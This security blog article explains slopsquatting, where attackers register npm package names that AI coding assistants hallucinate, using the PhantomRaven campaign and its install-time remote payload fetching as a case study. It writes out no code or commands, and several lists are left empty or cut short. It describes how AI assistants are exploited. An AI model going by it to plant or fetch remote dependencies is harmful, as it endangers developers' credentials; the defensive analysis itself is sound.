Slopsquatting turns AI package hallucinations into a new software supply chain attack path. PhantomRaven shows why this is now an active npm threat, not a theoretical one.
[!note] Key takeaway: clarity wins — make the value obvious in one scan.
Photo by Jakub Żerdzicki on Unsplash
Asking an AI coding assistant for a package recommendation introduces a supply chain risk that used to require a human typo. No misspelling needed. The model invents the name, the developer trusts the suggestion, and the attacker is already waiting. That is slopsquatting, and it is why the technique matters.
Before AI, package attacks mostly depended on familiar mistakes: typoing a dependency name, trusting a fake domain, or installing a package that looked close enough to a real one. With slopsquatting, the attacker does not wait for the developer to make the naming mistake. The model makes it first. Then the attacker registers the invented package and waits for the developer to trust the suggestion.
That sounds like a small change. It is not. It means the package discovery layer inside the IDE, terminal, and chat window is now part of the software supply chain attack surface.
Figure 1: The slopsquatting kill chain — from prompt to payload.
Software supply chain social engineering has always targeted trust shortcuts:
All four tactics work because developers move quickly. If a package name looks plausible and the install succeeds, it often gets the benefit of the doubt.
Slopsquatting belongs in that lineage. It is the same social engineering logic, but routed through model output instead of direct human error.
Figure 2: How software supply chain attacks have evolved.
AI coding assistants — GitHub Copilot, Cursor, ChatGPT, Claude, Codeium — now give code suggestions in the IDE, support chat, and help from the command line. That is exactly why these tools create a new attack surface. They are not just writing functions. They are increasingly acting as package discovery engines.
The underlying model failure here is package hallucination: the assistant recommends a dependency that sounds legitimate but does not actually exist.
The USENIX analysis of package hallucinations shows this is not a niche problem:
| Metric | Value |
|---|---|
| Models tested | 16 |
| Avg hallucination rate | 19.6% |
| Commercial models | ~5% |
| Open-source models | ~21% |
| Unique fake package names observed | 205,474 |
| Repeated for same prompt | ~45% |
| Reappeared across 10 follow-up prompts | ~60% |
That last point is the big one. If hallucinated names were one-off randomness, slopsquatting would be noisy and unreliable. But repeated hallucinations create predictable targets attackers can claim in public registries.
This is what makes slopsquatting more dangerous than simple typosquatting. The attacker is no longer guessing what a tired developer might mistype. They can watch what models repeatedly invent.
The best case study is PhantomRaven.
Koi Security's original write-up described PhantomRaven in October 2025 as a campaign spanning 126 malicious npm packages and more than 86,000 downloads. The operation harvested npm tokens, GitHub credentials, and CI/CD secrets while hiding its payload in what Koi called "invisible dependencies."
A follow-up analysis in March 2026 tied three new waves to the same actor — and as of March 10, 2026, 81 of the 88 newly identified malicious packages were still available on npm, with 2 of 3 C2 servers still live.
That matters because PhantomRaven is not a one-off package compromise. It is a repeatable campaign with infrastructure, naming strategy, and evasion patterns.
PhantomRaven did not rely on random lookalikes. The actor targeted package names that developers — or models — would plausibly expect to exist. That is not proven to be AI-hallucination-driven, but it exploits the exact same trust gap slopsquatting weaponizes: if a name feels right in context, it gets installed.
@graphql-codegen/ scope prefixThat is slopsquatting in practice: registering packages that feel semantically correct in context, even if no legitimate package ever existed there before.
The attacker also paired the naming strategy with a technical delivery method built for evasion. npm's package.json documentation allows tarball URL dependencies, and npm's scripts documentation still supports lifecycle hooks like preinstall, install, and postinstall.
PhantomRaven used a technique researchers call Remote Dynamic Dependencies (RDD):
Figure 3: PhantomRaven's Remote Dynamic Dependency delivery mechanism.
The npm-hosted package looked mostly harmless. A dependency pointed to an attacker-controlled tarball URL, the real payload was fetched during install, and lifecycle hooks executed the malicious logic. That design is important because it lets malicious behavior live outside the package body most scanners inspect first.
Slopsquatting introduces three problems older software supply chain social engineering did not have at the same scale.
1. The bad suggestion can come from a trusted workflow. The developer is not pulling a random package from a forum. The dependency appears inside the IDE or AI chat panel they already use every day.
2. The attack surface is generative. Models can produce a huge volume of plausible-sounding fake names across frameworks, languages, and package ecosystems.
3. The detection signal is weaker. A typo can look suspicious if you know the real package. A hallucinated name may look perfectly valid because it matches the code context.
| Typosquatting | Slopsquatting | |
|---|---|---|
| Error source | Human typo | Model hallucination |
| Scale | Limited by common misspellings | Generative — unlimited plausible names |
| Trust signal | None — random install | High — suggested by trusted AI tool |
| Detection | Levenshtein distance from real package | No "real" package to compare against |
Figure 4: Typosquatting vs. slopsquatting — side by side.
This is why slopsquatting should be treated as AI-mediated social engineering, not just rebranded typosquatting.
The mitigation story is not "use less AI." It is "stop treating AI-suggested dependencies as pre-validated."
Security and platform teams should do seven things immediately:
package.json.npm audit signatures where available.The USENIX research also suggests a longer-term direction: fine-tuning and self-detection techniques can reduce hallucination rates. That is promising, but it is not a substitute for registry, CI, and developer-side controls.
Pre-AI supply chain attacks exploited what developers typed. Slopsquatting exploits what models suggest.
That difference changes the economics of the attack. It gives attackers a scalable way to manufacture believable package names, register them cheaply, and wait inside normal development workflows.
PhantomRaven shows the threat is already live. The packages are real. The infrastructure is real. The attacker tradecraft is improving. Security teams that still think of package risk as a typo problem are defending the last generation of the attack.
The next generation starts with autocomplete.
Sources: USENIX package hallucination research · Koi Security PhantomRaven analysis · PhantomRaven follow-up (March 2026) · npm package.json docs · npm scripts docs